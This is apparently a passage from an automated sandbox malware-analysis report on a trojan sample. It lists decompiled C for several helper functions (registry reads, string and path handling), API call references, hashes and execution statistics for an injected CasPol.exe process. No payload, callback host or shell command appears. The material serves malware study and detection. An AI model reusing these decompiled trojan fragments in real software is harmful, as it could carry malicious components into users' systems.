Opcode Fuzzy Hash: 0dea828d0dd479423763887dac230e90f27d8b8ae518018479b0ad82d517bb95
Instruction Fuzzy Hash: F3017CB1100608BFDF209F11DD80AAB3B27EB84754F50453AFA01762D5D77A8E92DA69

Uniqueness

Uniqueness Score: -1.00%

Function 0040640B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44
registryCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E0040640B(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, short* _a12, char* _a16, signed int _a20) {
				int _v8;
				long _t21;
				long _t24;
				char* _t30;

				asm("sbb eax, eax");
				_v8 = 0x800;
				_t21 = E004063AA(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
				_t30 = _a16;
				if(_t21 != 0) {
					L4:
					 *_t30 =  *_t30 & 0x00000000;
				} else {
					_t24 = RegQueryValueExW(_a20, _a12, 0,  &_a8, _t30,  &_v8);
					_t21 = RegCloseKey(_a20);
					_t30[0x7fe] = _t30[0x7fe] & 0x00000000;
					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
						goto L4;
					}
				}
				return _t21;
			}

0x00406419
0x0040641b
0x00406433
0x00406438
0x0040643d
0x0040647b
0x0040647b
0x0040643f
0x00406451
0x0040645c
0x00406462
0x0040646d
0x00000000
0x00000000
0x0040646d
0x00406481

APIs

RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000000,?,00000000,?,?,Call,?,?,00406672,80000002), ref: 00406451
RegCloseKey.ADVAPI32(?,?,00406672,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsd7AB8.tmp\System.dll), ref: 0040645C

Strings

Call, xrefs: 00406412

Memory Dump Source

Source File: 00000001.00000002.18481482091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.18481421058.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481572260.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481621853.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481825460.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481848060.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481883817.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481943763.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481976578.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CloseQueryValue
String ID: Call
API String ID: 3356406503-1824292864
Opcode ID: a598e195228f1036644e08b1753da052d1713cd74bd9ea8ab147b12b545f69e3
Instruction ID: a8d415a3dc4e4479eaaa65942f717852bb8bd3539c12dad3b2e52d491ce509ba
Opcode Fuzzy Hash: a598e195228f1036644e08b1753da052d1713cd74bd9ea8ab147b12b545f69e3
Instruction Fuzzy Hash: FB017C72510209AADF21CF51CC09EDB3BB8FB54364F01803AFD5AA6190D738D968DBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00403B57 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403B57() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t8;

				_t8 =  *0x42b22c;
				_t3 = E00403B3C(_t2, 0);
				if(_t8 != 0) {
					do {
						_t6 = _t8;
						_t8 =  *_t8;
						FreeLibrary( *(_t6 + 8));
						_t3 = GlobalFree(_t6);
					} while (_t8 != 0);
				}
				 *0x42b22c =  *0x42b22c & 0x00000000;
				return _t3;
			}

0x00403b58
0x00403b60
0x00403b67
0x00403b6a
0x00403b6a
0x00403b6c
0x00403b71
0x00403b78
0x00403b7e
0x00403b82
0x00403b83
0x00403b8b

APIs

FreeLibrary.KERNEL32(?,758D3420,00000000,C:\Users\user\AppData\Local\Temp\,00403B2F,00403A5E,?), ref: 00403B71
GlobalFree.KERNEL32(?), ref: 00403B78

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00403B57

Memory Dump Source

Source File: 00000001.00000002.18481482091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.18481421058.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481572260.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481621853.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481825460.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481848060.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481883817.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481943763.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481976578.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Free$GlobalLibrary
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 1100898210-3355392842
Opcode ID: 14d9b0f9b7ecca22f0083886da8930ddd6c03ed0d6fdc94ff3a28603f1b7b4ab
Instruction ID: 19c5699a9bb8b3376c06320bd1355d3f7d45777e2bc9a3354ca833756e7661a4
Opcode Fuzzy Hash: 14d9b0f9b7ecca22f0083886da8930ddd6c03ed0d6fdc94ff3a28603f1b7b4ab
Instruction Fuzzy Hash: 40E0EC3290212097C7615F55FE08B6E7B78AF49B26F05056AE884BB2628B746D428BDC

Uniqueness

Uniqueness Score: -1.00%

Function 00405E58 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16
stringCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00405E58(WCHAR* _a4) {
				WCHAR* _t5;
				WCHAR* _t7;

				_t7 = _a4;
				_t5 =  &(_t7[lstrlenW(_t7)]);
				while( *_t5 != 0x5c) {
					_push(_t5);
					_push(_t7);
					_t5 = CharPrevW();
					if(_t5 > _t7) {
						continue;
					}
					break;
				}
				 *_t5 =  *_t5 & 0x00000000;
				return  &(_t5[1]);
			}

0x00405e59
0x00405e63
0x00405e66
0x00405e6c
0x00405e6d
0x00405e6e
0x00405e76
0x00000000
0x00000000
0x00000000
0x00405e76
0x00405e78
0x00405e80

APIs

lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,004030E9,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe,C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00405E5E
CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,004030E9,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe,C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe,80000000,00000003), ref: 00405E6E

Strings

C:\Users\user\Desktop, xrefs: 00405E58

Memory Dump Source

Source File: 00000001.00000002.18481482091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.18481421058.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481572260.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481621853.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481825460.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481848060.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481883817.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481943763.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481976578.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-3370423016
Opcode ID: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
Instruction ID: d2786f61c86b799b8b6ecf14661ff9643eaf9d362a95097130d0805b1e4d2bc4
Opcode Fuzzy Hash: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
Instruction Fuzzy Hash: 36D0A7B3410D20DAC3126718DC04DAF73ECFF6134074A442AF481A71A4D7785E8186ED

Uniqueness

Uniqueness Score: -1.00%

Function 00405F92 Relevance: 5.0, APIs: 4, Instructions: 37
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405F92(void* __ecx, CHAR* _a4, CHAR* _a8) {
				int _v8;
				int _t12;
				int _t14;
				int _t15;
				CHAR* _t17;
				CHAR* _t27;

				_t12 = lstrlenA(_a8);
				_t27 = _a4;
				_v8 = _t12;
				while(lstrlenA(_t27) >= _v8) {
					_t14 = _v8;
					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
					_t15 = lstrcmpiA(_t27, _a8);
					_t27[_v8] =  *(_t14 + _t27);
					if(_t15 == 0) {
						_t17 = _t27;
					} else {
						_t27 = CharNextA(_t27);
						continue;
					}
					L5:
					return _t17;
				}
				_t17 = 0;
				goto L5;
			}

0x00405fa2
0x00405fa4
0x00405fa7
0x00405fd3
0x00405fac
0x00405fb5
0x00405fba
0x00405fc5
0x00405fc8
0x00405fe4
0x00405fca
0x00405fd1
0x00000000
0x00405fd1
0x00405fdd
0x00405fe1
0x00405fe1
0x00405fdb
0x00000000

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA2
lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405FBA
CharNextA.USER32(00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FCB
lstrlenA.KERNEL32(00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD4

Memory Dump Source

Source File: 00000001.00000002.18481482091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.18481421058.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481572260.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481621853.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481825460.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481848060.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481883817.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481943763.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481976578.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
Instruction ID: bd09551308ad338638525116890fdadd4ab1f465f5503068af61de479685a4e4
Opcode Fuzzy Hash: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
Instruction Fuzzy Hash: 34F0C231604418FFC7029BA5CD0099EBBA8EF06250B2140AAF840FB210D678DE019BA9

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: CasPol.exePID: 3872, Parent PID: 3120COMMON

Execution Graph

Execution Coverage:	16.9%
Dynamic/Decrypted Code Coverage:	99.7%
Signature Coverage:	0.4%
Total number of Nodes:	794
Total number of Limit Nodes:	39

Executed Functions

Function 1D666B63 Relevance: 1.5, Strings: 1, Instructions: 263COMMON

Download Yara Rule

Strings

Xk, xrefs: 1D666B9F

Memory Dump Source

Source File: 00000005.00000002.23242318856.000000001D660000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1d660000_CasPol.jbxd

Similarity

API ID:
String ID: Xk
API String ID: 0-3738635399
Opcode ID: 9546ec63735b1544fd08fd8aeaa6d2a1869a5bd193f7760831c9ea293f26bdc9
Instruction ID: 14e3ca158ef36e5e8b93cb193b2190c94942759f949dc0eceace1093a927caff
Opcode Fuzzy Hash: 9546ec63735b1544fd08fd8aeaa6d2a1869a5bd193f7760831c9ea293f26bdc9
Instruction Fuzzy Hash: 45819234B082249BCB199FB5A45476E7AB7BFC8640B05C56DD506E7388DF34DC068BA2

Uniqueness

Uniqueness Score: -1.00%

Function 1D6669C8 Relevance: 2.6, Strings: 2, Instructions: 143
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Xk, xrefs: 1D666A25
Xk, xrefs: 1D666A4E

Memory Dump Source

Source File: 00000005.00000002.23242318856.000000001D660000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1d660000_CasPol.jbxd

Similarity

API ID:
String ID: Xk$Xk
API String ID: 0-2435460274
Opcode ID: f9b655e52c09845a48dc9264e73ca76193a5d5eac22df48fe9960b087e69791f
Instruction ID: 59e102810d99afbccbc48448da52b0ec3300c7900592b7f792a912896c068151
Opcode Fuzzy Hash: f9b655e52c09845a48dc9264e73ca76193a5d5eac22df48fe9960b087e69791f
Instruction Fuzzy Hash: EE41FC757082614BDB094AB9989437AB7E6ABCC244F15C5BAE909CB380DF75CC05C763

Uniqueness

Uniqueness Score: -1.00%

Function 1D669ECD Relevance: 1.4, Strings: 1, Instructions: 180COMMON

Download Yara Rule

Strings

t, xrefs: 1D669ECD

Memory Dump Source

Source File: 00000005.00000002.23242318856.000000001D660000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1d660000_CasPol.jbxd

Similarity

API ID:
String ID: t
API String ID: 0-2238339752
Opcode ID: daad2cced41226393e6143a0b2ea739e950aca24b92ad377661200d4414fb721
Instruction ID: 2da21093e67e27558eed08ff3c09eb2eff4da5fd9092c0bcece8a4302631f1e0
Opcode Fuzzy Hash: daad2cced41226393e6143a0b2ea739e950aca24b92ad377661200d4414fb721
Instruction Fuzzy Hash: A5716A70E04249DFDB00CFA9C8807EEFBF1BF88718F108129E819A7254DB749845CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 1D663EF0 Relevance: 1.4, Strings: 1, Instructions: 105COMMON

Download Yara Rule

Strings

d8k, xrefs: 1D663F58

Memory Dump Source

Source File: 00000005.00000002.23242318856.000000001D660000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1d660000_CasPol.jbxd

Similarity

API ID:
String ID: d8k
API String ID: 0-2028183502
Opcode ID: 54aae6ed049700987a0c4d5fd3032fc975d4e8a52faaee092ce466b75498afe5
Instruction ID: d1a9f1b4070e3bdafdfb476c6adfde57a754da4fcef58b457ebfbd6bb224c05b
Opcode Fuzzy Hash: 54aae6ed049700987a0c4d5fd3032fc975d4e8a52faaee092ce466b75498afe5
Instruction Fuzzy Hash: E231B1303087418FC315DB39D454B2ABBF6AF89615F05896CE59ACB7A1DB70ED04CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 1D66D9F3 Relevance: .5, Instructions: 525COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.23242318856.000000001D660000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1d660000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f827ac4364dd5a71e175ac46b6d26373e50ed72f7c8ef73335fd3d6303503e04
Instruction ID: 6e64ec3c2f2c8eb98d4079cf0cb394235c3d31e3d5cd0df27321b5389abbc995
Opcode Fuzzy Hash: f827ac4364dd5a71e175ac46b6d26373e50ed72f7c8ef73335fd3d6303503e04
Instruction Fuzzy Hash: FB328D74A0022C8FDB65EB70C9987EDB7B6AF88700F108599D80AA7785DF716E85CF11

Uniqueness

Uniqueness Score: -1.00%

Function 1D66DA00 Relevance: .5, Instructions: 522COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.23242318856.000000001D660000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1d660000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 36abbcedce83a64622bb31ac0b9cfc1fa67346d12be951a66109c3f8084224e8
Instruction ID: 3df5eac5a2e8ff2ccbe7a69c697b93778667dcc4ee998c66ad9dde7022cb4993
Opcode Fuzzy Hash: 36abbcedce83a64622bb31ac0b9cfc1fa67346d12be951a66109c3f8084224e8
Instruction Fuzzy Hash: 43327D74A0022C8FDB65EB70C9987EDB7B6AF88700F108599D80AA7785DF716E85CF11

Uniqueness

Uniqueness Score: -1.00%

Function 1D6645F0 Relevance: .3, Instructions: 327COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.23242318856.000000001D660000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1d660000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b42a6bfacebd224918676a25663b69bcc198a6d0ddcff69ed885b2e6f6cf62e
Instruction ID: 61b656c37e48a1a3b28b3f6b4f0d919ff1e7c52eae5aa80e1473523833096fba
Opcode Fuzzy Hash: 2b42a6bfacebd224918676a25663b69bcc198a6d0ddcff69ed885b2e6f6cf62e
Instruction Fuzzy Hash: 04C19C307042159FDB05DF64C894AAE77B7AF88344F158169E906DB394DB34EC46CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 1D66E47F Relevance: .3, Instructions: 319COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.23242318856.000000001D660000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1d660000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3929d5e0ba8798740d9e4070deeb54a20ec2c1790e7f103747ccb3fe3d39a88d
Instruction ID: 01fce4b02d6025b216dd69ebf82c45d088a45f491b7872c9cd1a5d75c5dbe322
Opcode Fuzzy Hash: 3929d5e0ba8798740d9e4070deeb54a20ec2c1790e7f103747ccb3fe3d39a88d
Instruction Fuzzy Hash: 96F1D87490A328CFDB65EF30D8986DAB771BF48315F1082E9D41AA2355DB329E85CF12

Uniqueness

Uniqueness Score: -1.00%

Function 1D66E50D Relevance: .3, Instructions: 305COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.23242318856.000000001D660000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1d660000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f683576d6e6d566dd4c1b0c6de9a0e1150ca612b8a4226fb948e3d3651e2bd28
Instruction ID: e35b29508bd6d527d1379bbf4e555738bd0288fed55e857eb90a82a584a274f3
Opcode Fuzzy Hash: f683576d6e6d566dd4c1b0c6de9a0e1150ca612b8a4226fb948e3d3651e2bd28
Instruction Fuzzy Hash: 6CF1D97490A328CFDB65EF30D8986DAB771BF48315F1082E9D41AA2355DB329E85CF12

Uniqueness

Uniqueness Score: -1.00%

Function 1D66E554 Relevance: .3, Instructions: 296COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.23242318856.000000001D660000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1d660000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4978dc5187c09ca4ccb0150358bbfd95f1da626e196387b375f18823028b2ff6
Instruction ID: 66ec9a5ed7bb8bb6cfd338c422402c703b8ab523d6efa33662d0a9452f1b15fe
Opcode Fuzzy Hash: 4978dc5187c09ca4ccb0150358bbfd95f1da626e196387b375f18823028b2ff6
Instruction Fuzzy Hash: 62F1D97490A328CFDB65EF30D8986DAB771BF49315F1082E9D41AA2345DB329E85CF12

Uniqueness

Uniqueness Score: -1.00%

Function 1D66E592 Relevance: .3, Instructions: 291COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.23242318856.000000001D660000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1d660000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf601bdcda5c2275c70569a4d5bf48724e154d66d0d01fcfc64413dd365f672d
Instruction ID: eb0fa66fc81342f41f88129354473580ee831c241f7f7be962eb03f92a5f11f6
Opcode Fuzzy Hash: cf601bdcda5c2275c70569a4d5bf48724e154d66d0d01fcfc64413dd365f672d
Instruction Fuzzy Hash: DDE1D87490A328CFDB65EF30D8986DAB771BF49315F1082E9D40AA2345DB329E85CF12

Uniqueness

Uniqueness Score: -1.00%

Function 1D66E5D9 Relevance: .3, Instructions: 282COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.23242318856.000000001D660000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1d660000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c011b5ee3c33de5e413f80f15d316590ce767571ffa71e852264eaeacf4982cc
Instruction ID: dd87c1a8defd5ebda869d2c4cf8c2e59c89c59122d68b7f9d892bb3fa9f0c0f1
Opcode Fuzzy Hash: c011b5ee3c33de5e413f80f15d316590ce767571ffa71e852264eaeacf4982cc
Instruction Fuzzy Hash: BBE1D97490A328CFDB65EF30D8986DAB771BF49315F1082E9D40AA2355DB329E85CF12

Uniqueness

Uniqueness Score: -1.00%

Function 1D66E808 Relevance: .2, Instructions: 228COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.23242318856.000000001D660000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1d660000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 486f7c4ea7ee327717cbd5d16a8d13222ef24f0d284b24d01e92d7bd7d5466bd
Instruction ID: 03678130cd24773bd988d3ffdee378bd63f85fcc9564bfb52e083d37e23c6905
Opcode Fuzzy Hash: 486f7c4ea7ee327717cbd5d16a8d13222ef24f0d284b24d01e92d7bd7d5466bd
Instruction Fuzzy Hash: 20C1C57490A328CFDB65EF30D8986DAB771BF49315F1082E9D40AA2345DB329E85CF12

Uniqueness

Uniqueness Score: -1.00%

Function 1D66E84F Relevance: .2, Instructions: 221COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.23242318856.000000001D660000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1d660000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 71d7febd975519c0649302a8d4c0f24edd7552b2756f08821453b265258039c2
Instruction ID: 06baf57a2b673ba1804c333354bf4daea56c13fa4f60c64b4a9c972a167651d7
Opcode Fuzzy Hash: 71d7febd975519c0649302a8d4c0f24edd7552b2756f08821453b265258039c2
Instruction Fuzzy Hash: CEB1C67490A328CFDB65EF30D8986DAB771BF49315F1082E9D40AA2355DB329E85CF12

Uniqueness

Uniqueness Score: -1.00%

Function 1D66E896 Relevance: .2, Instructions: 214COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.23242318856.000000001D660000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1d660000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4252da9dd4e6342913a47a70dd5d752f0a6b56d1bf3386078126877a08104f4e
Instruction ID: 97d56eba2cfa347c320be9bf9fec9b5007e56527c7dab259b6534412b5652112
Opcode Fuzzy Hash: 4252da9dd4e6342913a47a70dd5d752f0a6b56d1bf3386078126877a08104f4e
Instruction Fuzzy Hash: 54B1B774909328CFDB65EF30D8986DAB771BF49315F1082E9D41AA2345DB329E85CF12

Uniqueness

Uniqueness Score: -1.00%

Function 1D66E8DD Relevance: .2, Instructions: 207COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.23242318856.000000001D660000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1d660000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f00d1e7db840ef46aff8958f792a91359cfe01248a272e901fb5d5d9020fa6a
Instruction ID: ca80aae7a90282686dfa800827aa271ca5d3898b56d3f882d1222cb0dfdcd5ff
Opcode Fuzzy Hash: 9f00d1e7db840ef46aff8958f792a91359cfe01248a272e901fb5d5d9020fa6a
Instruction Fuzzy Hash: 3AB1C674909328CFDB65EF30D8986DAB771BF49315F1082E9D40AA2345DB329E85CF12

Uniqueness

Uniqueness Score: -1.00%

Function 1D66E924 Relevance: .2, Instructions: 200COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.23242318856.000000001D660000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1d660000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e412e5e4bb9029520ae3bd9d542dfb022fbe6ff18870c64c8de995163f67f5e
Instruction ID: 9000a24bdf99d3b72c481f3452e253a323be0e55507bbdfa67a29ba17df7b35d
Opcode Fuzzy Hash: 0e412e5e4bb9029520ae3bd9d542dfb022fbe6ff18870c64c8de995163f67f5e
Instruction Fuzzy Hash: AAA1C77490A328CFDB65EF30D8986DAB771BF49315F1082E9D40AA2345DB329E85CF12

Uniqueness

Uniqueness Score: -1.00%

Function 1D66E96B Relevance: .2, Instructions: 193COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.23242318856.000000001D660000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1d660000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01e36f0aafeaf4b4d40509d57a537ec70cbe5c16d21026a55bf824797c45b3b0
Instruction ID: 251541c8a00063514f38dd6f31c37a6f73166d5cf92cf3fc84800fdc7bf06d2d
Opcode Fuzzy Hash: 01e36f0aafeaf4b4d40509d57a537ec70cbe5c16d21026a55bf824797c45b3b0
Instruction Fuzzy Hash: 09A1C674909328CFDB65EF30D8986DAB771BF49315F1082E9D40AA2355DB329E85CF12

Uniqueness

Uniqueness Score: -1.00%

Function 1D66E9B2 Relevance: .2, Instructions: 184COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.23242318856.000000001D660000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1d660000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 902c7277ae6199ae154662cd222f85e0ce4f484eb4d1f1468543a1fe1eddf326
Instruction ID: 90947a76be96b158a0567a34af1add34fd6bdc7769e13fe9dc5f9fdf460e8d71
Opcode Fuzzy Hash: 902c7277ae6199ae154662cd222f85e0ce4f484eb4d1f1468543a1fe1eddf326
Instruction Fuzzy Hash: FE91C87490A328CFDB65EF30D8986DAB771BF49315F1082E9D40AA2355DB329E85CF12

Uniqueness

Uniqueness Score: -1.00%

Function 1D669ED8 Relevance: .2, Instructions: 180COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.23242318856.000000001D660000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1d660000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e640a3371bf2a60be71f94ce67436325f6f0eeac283fa1c4866d0f1588281fdf
Instruction ID: 3f191f09823d4033b0fde0334f47364041449301efd6773c8b9c6f49a4eeaaa1
Opcode Fuzzy Hash: e640a3371bf2a60be71f94ce67436325f6f0eeac283fa1c4866d0f1588281fdf
Instruction Fuzzy Hash: 3E715A70E04249DFDB10CFA9C8807EEFBF2BF88718F158129E415A7254EB759845CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 1D66E9F0 Relevance: .2, Instructions: 179COMMON

Download Yara Rule

